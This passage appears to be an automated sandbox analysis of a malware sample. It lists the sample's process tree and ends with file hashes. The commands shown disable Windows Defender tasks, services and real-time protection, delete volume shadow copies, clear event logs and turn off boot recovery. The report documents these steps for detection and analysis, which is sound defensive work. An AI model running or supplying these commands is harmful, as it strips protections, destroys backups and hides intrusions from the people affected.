    [2] C:\Windows\SYSTEM32\schtasks.exe (PID 3948)
        cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    [2] C:\Windows\SYSTEM32\schtasks.exe (PID 2212)
        cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    [2] C:\Windows\SYSTEM32\schtasks.exe (PID 2364)
        cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    [2] C:\Windows\SYSTEM32\schtasks.exe (PID 1556)
        cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    [2] C:\Windows\SYSTEM32\reg.exe (PID 1064)
        cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
    [2] C:\Windows\SYSTEM32\reg.exe (PID 3920)
        cmd: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
    [2] C:\Windows\SYSTEM32\reg.exe (PID 4012)
        cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
    [2] C:\Windows\SYSTEM32\reg.exe
        cmd: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
- Modifies registry class
PID:3748 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1772 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2928 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3700
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:684
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1152
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3424
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:3724 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1408
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3400 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1244 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2840 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2028 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:692 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:876 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3844 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:3884 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2996
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:3708 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2240
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:828 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:364
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1248
Network
MITRE ATT&CK Enterprise v6
Downloads
-
MD5
8592ba100a78835a6b94d5949e13dfc1
SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5
c5697ac0589bf2701ab6a98f0150ce12
SHA1
bf8d4435721ee28182417f39dfb93ace9241d449
SHA256
5631f2438d0546d7cbcce5c5a8ed77be3a41bb36c12d6c93a3eb326d78eb5b0b
SHA512
0d93b4b5e99c2d0595cfa0700cabba8fa239c51b867af909596e59cc5ddcf0befe60d148d4a6dde9cd12f18c5de451f334b29a63f7095f1737006f0e3c37659b